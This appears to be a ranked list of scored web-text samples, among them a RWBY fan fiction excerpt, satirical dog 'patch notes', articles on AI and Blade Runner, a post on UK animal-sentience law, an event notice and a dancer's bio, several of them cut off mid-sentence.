<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 44; Score = 692224.0 +<|begin_of_text|>While team RWBY meandered through Vale, Weiss felt… jealous. + +Jealousy was not a feeling that someone such as Weiss should feel, she knew that, it was… beneath her to feel that petty. That she shouldn't feel that way just because her partner spent less and less time with her. That she had been replaced. + +I don't get it, Weiss watched Ruby lead Blake into an arcade, I thought we were partners, ergo close friends? It made sense to her. Your partner is the person you are closest to, but I don't feel close to Ruby at all anymore. + +When their first semester had started, Ruby and her were more or less, well, inseparable. Not that Weiss hadn't tried to separate herself from Ruby; it got more than a bit too much for her sometimes having the younger teen constantly trying to interact with her. Looking back at it, as much as Weiss had found Ruby to be annoying it was still nice. It was nice to have someone who genuinely wanted to be your friend and not because of your name. + +Towards the end of the last semester, it felt like that closeness was slowly receding as Ruby spent less and less time with Weiss and more with another one of their teammates; Blake. + +It was little surprise to Weiss that Ruby knew about Blake's… heritage, given the amount of time the two had spent together. What did surprise Weiss was the fact that Blake had stayed with Ruby and Yang over the semester break. No, that's not quite right, it didn't surprise me, it also hurts. Her teammates, no, her friends, spent the break together. Without her. + +Weiss felt alone. + +At first Weiss had assumed she was feeling needy, that she was perhaps being a bit too harsh on Ruby when they studied and that was what was pushing her partner away. During the break, Weiss had made a promise to fix whatever… issue had come up, to reconnect with her partner. + +Yet Weiss felt more alone than ever, her partner was off with Blake, almost entirely ignoring her. I suppose I have been replaced. Weiss let out a sigh. Did I screw up? Was it something I did? + +Or perhaps Blake is just better than me? + +No, that wasn't the case. Weiss knew the answer all too easily; Ruby had a crush on Blake. Ruby could never be considered subtle, so it was obvious why her partner was spending more time with Blake. It didn't change the fact that the declining absence of Ruby was affecting Weiss. +================================================================================ +Rank = 45; Score = 684032.0 +<|begin_of_text|>Come now little black sheep, what have you done? Gave away your fleeces three and now you have none. + +You gave one to the ploughing man to give to his growing son, you gave one to the ploughing man and now you have none. The ploughing man, the ploughing man, the ploughing man has one. You gave one to the ploughing man and now you have none. + +You gave one to the farmers wife to make her blankets from, you gave one to the farmers wife and now you have none. The farmer’s wife, the farmer’s wife, the farmer’s wife has one. You gave one to the farmer’s wife and now you have none. + +You gave one to the little boy whose life it had just begun, you gave one to the little boy and now you have none. The little boy, the little boy, the little boy has one. You gave one to the little boy and now you have none. + +The coldness it is setting in, your skin it is raw and numb. The coldness it is setting in, and you are barely warm. Setting in, it’s setting in, the coldness it has come. The coldness it is setting in and you are barely warm.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 46; Score = 684032.0 +<|begin_of_text|>Stephen Hawking, who is part machine, wants to stop the rise of the machines. + +From Fast Company: + +Stephen Hawking, who turns 71 today, has joined the board of an international think tank devoted to defending humanity from futuristic threats. The Cambridge Project for Existential Risk is a newly founded organization which researches existential threats to humanity such as extreme climate change, artificial intelligence, biotechnology, artificial life, nanotech, and other emerging technologies. Skype cofounder Jaan Tallinn and Cambridge professors Huw Price and Martin Rees founded the project in late 2012. + +Price and Tallinn collaborated on a speech at the 2012 Sydney Ideas Festival which argued that artificial intelligence has reached a threshold that could lead to an explosion of autonomous machine dominance similar to the rise of Homo sapiens. The Cambridge Project for Existential Risk's stated goal is to establish a research center dedicated to the study of autonomous robot (and other) threats within Cambridge University.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 47; Score = 675840.0 +<|begin_of_text|>Comment In the Blade Runner universe the Nexus 6 replicant calling itself Roy Batty rolled off the production lines of the Tyrell Corporation today. Sadly, or some might say luckily, the tech industry hasn't yet caught up with Hollywood. + +I do have a Nexus 6 on my desk right now, but it's a sizable phablet of a phone, rather than a humanoid killing machine. Technology still has a long way to come. + +Batty, masterfully played by Dutch actor Rutger Hauer, was what screenwriters thought would be coming down the line a generation later than filming. Like most science fiction creations, Batty's timeline was horribly wrong, but why don't we have humanoid robots walking among us these days? + +Firstly, programming a robot to mimic human beings is incredibly hard. The bipedal locomotion we're familiar with is something humans have evolved over a few hundred thousand years and it turns out it's surprisingly tricky to replicate. + +Balancing a high torso on mechanical hips and making a robot walk isn't something that's easy without a lot of computing power to stay stable. Anyone who has got wankered on a Friday night will appreciate the problem – balance is one of the first things to go when the brain gets sloppy. + +DARPA is currently trying to find a humanoid robot that can handle even simple tasks like opening a door or driving a car. So far the results haven't been good, to say the least. Building the hardware is easy – getting the motor skills to move it is something else entirely. + +At the time Blade Runner was made, mainstream computing was in its infancy. IBM had just brought out its first PC, chip manufacturers weren't even close to gigahertz speeds, and the rest of computer hardware like memory and hard drives were (comparatively) huge, slow, and very expensive. + +Batty was listed as a high-performance combat drone, with excellent intellectual abilities that would have put it in genius mode. Leaving aside the physical aspects of robotics (and clothing them in human skin – – which could well take another hundred years to manage) there's still a considerable brain gap to fill. + +After decades of trying, we're still nowhere close to artificial intelligence or even a computer that could pass the Turing test or convince JF Sebastian to trust it with his life. Even the most advanced machine-learning systems can be beaten by a five-year-old incentivized by a chocolate bar. + +Getting silicon smarter takes huge amounts of computing power – server racks full of hardware and carefully designed software subr +================================================================================ +Rank = 48; Score = 675840.0 +<|begin_of_text|>-Fixed a bug that caused small dogs to start barking and never stop. + +-Small dogs are no longer supported, and will self-terminate within two months. + +-St. Bernard size increased 100%. + +-St. Bernard's cask will no longer contain brandy. Now contains one of four dipping sauces (ranch dressing, sweet and sour, honey mustard and barbecue). + +-Improved saliva production in certain breeds by as much as 300%. + +-Removed a rare glitch that would cause a dog's head to rotate 360 degrees when looking inquisitively at operator. + +-Dogs now regard vacuum cleaners as friends and will attempt to operate them. + +-Fixed a bug that caused dogs to incorrectly regard fecal matter as food. + +-Fixed an error that caused social interaction between dogs to occur on the wrong end. + +-Fixed an issue where some breeds would grow curly hair, making them appear effeminate and prissy. + +-Improved dog pathfinding, allowing them to better navigate to operators located at higher altitudes or behind complicated obstacles. + +-Dramatically reduced instances of autoerotic behavior in public. + +-Addressed a logic error that caused some dogs to hysterically chomp at bees. + +-Fixed a rare glitch where a dog would regard its own tail as an enemy. + +-Removed an exploit that would allow operators to duplicate their dogs endlessly. + +-Placing a small ball or toy in a dog's open mouth while it is yawning will no longer cause it to shut down. + +-Reduced bloodhound "droopiness" by 25%. + +-Fixed issues of dogs turning hostile when spoken to in a funny or scary voice. + +-Introduced fixes for three common benign situations that would cause a dog to become sexually aroused. + +-Fixed error of dog incompatibility with chocolate cake. Should greatly improve experience of being dog. + +-Fixed a bug that would cause floppy ears to flip over the wrong way, requiring an operator to reset them to their default position. + +-Dogs should no longer drag butts across carpeting in presence of operators. + +-Fixed rendering bug that caused deformed geometry on pug faces. + +-Investigated issue of pit bulls entering rings of screaming men, biting each other to death; confirmed cause as operator error. + +-Fixed vocalization issue in huskies which would cause them to utter "I love you" when trying to say "stop tormenting me." + +-Added a routine to flush loyalty cache of dogs upon death of operators, preventing documented issues of dogs waiting at train stations for 15 years. + +-Fixed a +================================================================================ +Rank = 49; Score = 671744.0 +<|begin_of_text|>Artificial intelligence is gradually becoming smarter and more human-like. As an exponential technology, it has taken decades of seemingly slow progress to get us to where we are. But now, in only in the last few years we’ve seen some major breakthroughs, and they are accelerating. + +The Game of Artificial Intelligence + +Mapping Patterns for Better Results + +The rise of the machines is something sci-fi writers and movie makers have been depicting for years, but is life now on the cusp of imitating art? According to futurist Gerd Leonhard, the future is already here and we just don’t know it. In his book Technology vs. Humanity: The Coming Clash Between Man and Machine, Leonhard explains that the gradual melding of humans and machines is about to reach a tipping point.“Our world is entering a period of truly transformative change where many of us will be surprised by the scale and pace of developments we simply hadn't anticipated,” writes Leonhard.However, unlike many nihilistic views of modern technology and its continued integration into our lives, Leonhard believes the coming years offer “tremendous” potential. One area that looks set to provide the most potential is artificial intelligence (AI). Currently the peak of computer technology, AI is gradually becoming more intelligent and, in many respects, more human-like. Of course, AI is nothing new. Early efforts to make machines capable of autonomous "thought" started in the 40s, but it's only in the last few years we’ve seen some major breakthroughs.Thanks to the spending power of companies such as Google, Apple, Intel and IBM, AI developers now have a chance to flourish. Indeed, according to CB Insights’ data, 250 private AI companies across various verticals have been purchased by major tech brands since 2012. Google has been the most active, picking up 12 AI operations since 2012 with one of its most notable purchases being DeepMind Technologies. Based in the UK, DeepMind is at the forefront of machine learning, and its system managed to beat the world’s leading Go master (a game considered more complex than chess) back in 2016.On top of its own efforts to advance AI, Google’s “Experiment” is an open platform where coders can submit their own projects across a variety of platforms. Alongside virtual reality and other tech trends, AI experiments are flourishing and that’s opening the doors to some intriguing potential uses of the technology. Perhaps the most famous demonstration of AI’s ability to learn new skills came in +================================================================================ +Rank = 50; Score = 671744.0 +<|begin_of_text|>Two recent events have inspired a slew of bad reporting in the UK about animal research. The first was a vote in Parliament rejecting a call to describe animals as sentient into British law. The second was the publication of the Northern Irish statistics. + +On 15th November, Parliament voted down an amendment to the European Union (Withdrawal) Bill that stated “Obligations and rights contained within the EU Protocol on animal sentience set out in Article 13 of Title II of the Lisbon Treaty shall be recognised and available in domestic law on and after exit day, and shall be enforced and followed accordingly.” While there is no clear scientific definition of sentience, it has, in crude terms, been taken to mean the capacity to feel pain and/or emotion. The relevant part of the Lisbon Treaty (which Britain will withdraw from upon Brexit) reads: + +In formulating and implementing the Union’s agriculture, fisheries, transport, internal market, research and technological development and space policies, the Union and the Member States shall, since animals are sentient beings, pay full regard to the welfare requirements of animals, while respecting the legislative or administrative provisions and customs of the Member States relating in particular to religious rites, cultural traditions and regional heritage. + +The amendment was rejected 313 votes to 295 (roughly down party lines). A few days later a number of articles began reflecting on this. A well-shared article in The Independent by Yas Necati claimed that the Government had voted “that all animals (apart from humans, of course) have no emotions or feelings, including the ability to feel pain.” + +What seems to have been ignored is that the protection of sentient animals is already embodied in British law. Most animal use is governed by the Animal Welfare Act, 2006, which protects any animals where an: “appropriate national authority is satisfied, on the basis of scientific evidence, that animals of the kind concerned are capable of experiencing pain or suffering”. The act also includes provisions to be extended to invertebrates if they seem to be able to suffer or feel pain. Essentially the Animal Welfare Act is an entire piece of UK domestic law dedicated to protecting sentient animals. + +For animals in laboratories, the relevant legislation is not the Animal Welfare Act, but the Animals (Scientific Procedures) Act, 1986 (better known as ASPA). This act protects all vertebrate species, and invertebrates considered potentially able to suffer or feel pain (currently only cephalapods). The act covers all “regulated procedures” defined as those “which may have the effect of +================================================================================ +Rank = 51; Score = 663552.0 +<|begin_of_text|>The first General Assembly On Immaterial Digital Labor and Universal Basic Income will meet on Friday, April 3rd, 2015 o Grand Street in New York. According to the organizers, the General Assembly will be the inaugural meeting of people interesting in exploring action-based responses to the global “time-famine” created by the digital economy, the collapse of work and play in social media and “hope labor” economies, the rise of unpaid internships, and the burgeoning freelance market. The inaugural meeting will begin to define responses to these issues and the goals of this assembly. + +The Assembly springs from the conversations in the Facebook Group, Immaterial Digital Labor, which includes some 970 members. The group has presented the topics of digital labor, automation, machine learning, and emergent definitions of labor and is moving forth towards more material action-based organizing. The organizers propose this as a gathering of people committed to making decisions based upon a collective agreement or consensus model. Anyone is free to propose an idea or express an opinion as part of the General Assembly. The Assembly will be led by facilitators only just as much as needed, no more. + +The Universal Basic Income will be proposed as one of many possible platforms of solidarity. An exercise defining the terms: immaterial labor, digital labor, knowledge-economy, and a short presentation will open the Assembly, followed by an open discussion moved by the proposed and collective interest of attendees. + +Friday, April 3rd, 2015 7:00-10:00 PM + +PARMER at Abrons Art Center + +Experimental Theater, 466 Grand St, New York, NY 10002 + +Statement: http://www.parmer.info/_events/2015-04-03-IDL-UBI-statement.html + +Event website: https://www.facebook.com/events/1067136066635771/ + +Facebook group: https://www.facebook.com/groups/immaterial.labor/?ref=br_tf + +Site: http://www.immaterialdigitallabor.net/ + +Email: with questions, comments, proposals, press inquiries.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 52; Score = 651264.0 +<|begin_of_text|>Leave some for the rest of us! + +Hey, you can only buy 15 of these. + +Harder, Fetter, Faster, Shirter. + +Han after all. + +Like the legend of the Phoenix + +All trends help our earnings + +What keeps ShirtWoot from hurting + +The force from our beginning + +We’ve gone too far + +But you know who we are + +These shirts buy us fast cars + +And at least it’s not Jar Jar. + +Come on and buy at least one + +Nerd shirts can never be done + +We know you like a good pun + +We hope you’ll all buy Fett Lucky + +Pop culture has no ending + +That gift keeps on giving + +Per se, it's not stealing + +If you want to leave - wait, don't actually do that, please. + +Come on and buy at least one + +Nerd shirts can never be done + +We know you like a good pun + +We hope you’ll all buy Fett Lucky + +Come on and buy at least one + +Nerd shirts can never be done + +We know you like a good pun + +We hope you’ll all buy Fett Lucky + +Come on and buy at least one + +Nerd shirts can never be done + +We know you like a good pun + +We hope you’ll all buy Fett Lucky + +(times a billion) + +(imminent shower of money) + +Back to top<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 53; Score = 638976.0 +<|begin_of_text|>Warning: This piece contains major Blade Runner 2049 spoilers. + +“…you can’t disprove the existence of conscious experiences by proving that they are only an appearance disguising the underlying reality, because where consciousness is concerned, the existence of the appearance is the reality.” - John Searle, The Construction of Social Reality + +“But in the case / Of my white fountain what it did replace / Perceptually was something that, I felt, / Could be grasped only by whoever dwelt / In the strange world where I was a mere stray.” - Vladimir Nabokov, Pale Fire + +“…blood-black nothingness began to spin / A system of cells interlinked within / Cells interlinked within cells interlinked / Within one stem. And dreadfully distinct / Against the dark, a tall white fountain played.” These lines from Blade Runner 2049’s post-traumatic baseline test come from Vladimir Nabokov’s novel Pale Fire. In Pale Fire, the fictional poet John Shade sees a tall white fountain during a near-death experience - the image’s “presence always would / Console [him] wonderfully.” Later Shade reads about a woman in a magazine who came close to death, who visited “the Land Beyond the Veil” and also glimpsed a “tall white fountain” there. Shade finds the woman to share this with her, only to discover it was a misprint - it was not a “fountain” but a “mountain” that she saw. But the error changes nothing: the image of the tall white fountain had meaning not because it had some objective significance, not because it was empirical proof of an afterlife, but because Shade ascribed meaning to it. The fictional scholar annotating John Shade’s poem, Dr. Charles Kinbote, writes: “We all are, in a sense, poets.” + +And Denis Villeneuve’s Blade Runner 2049 is a poem. It’s a neo-noir about the mystery of the self, empathy, connection, how we define what’s real, whether it matters at all. And it’s a love story about a replicant and a digital woman. Screenwriter Hampton Fancher explained that, “[K] is a handbook. He follows the rules. He’s a machine in a way. But the image was this: A handbook turns into a poem through his experiences and his ordeal and love. And the same thing with the digital woman.” While retiring an old-model replicant, Ryan Gosling’s blade runner K discovers the skeleton of a +================================================================================ +Rank = 54; Score = 638976.0 +<|begin_of_text|>Maren Waldman is a dancer, choreographer, educator, and body-worker who is passionate about researching the ways that dance and movement build connection. Her work draws on permaculture principles, body awareness healing practices, and dance technique to specifically investigate the relationship between the body and the planet. Her art-activism takes a heart-centered approach to addressing urgent environmental concerns. + +Maren earned a Permaculture Design Certificate from the Finger Lakes Permaculture Institute in 2012 and an MFA in Dance Performance and Choreography with a focus on Somatics from the University of Colorado, Boulder in 2014. A former Ithaca resident, she is excited to return to her beloved homeland in June and share her work. + +Ms. Waldman’s current project, Postcards to the Earth, engages people in expressing their personal, emotional relationship to the Earth. The project exists in many forms including a live dance performance, a dance film, and a growing postcard collection. Maren will be sharing her postcard project at Radical Reconnecting through Permaculture, Ceremony, and Movement on the summer solstice, June 21, 2014. + +In an interview with this author, She describes her current work: + +A postcard is a simple act of communication typically sent from one to another across a distance. In western industrial society, we have chosen lifestyles that separate us from the Earth. We have forgotten our integral role as members of our planet’s ecosystem. Writing a postcard to a favorite place in nature invites us to pause in our busy lives, remember our connection to the earth, and take action through expression. My hope is that this postcard collection grows as people worldwide contribute their voices. The growing collection makes our collective voices visible and material, elucidating the reality of our human-earth relationship.” + 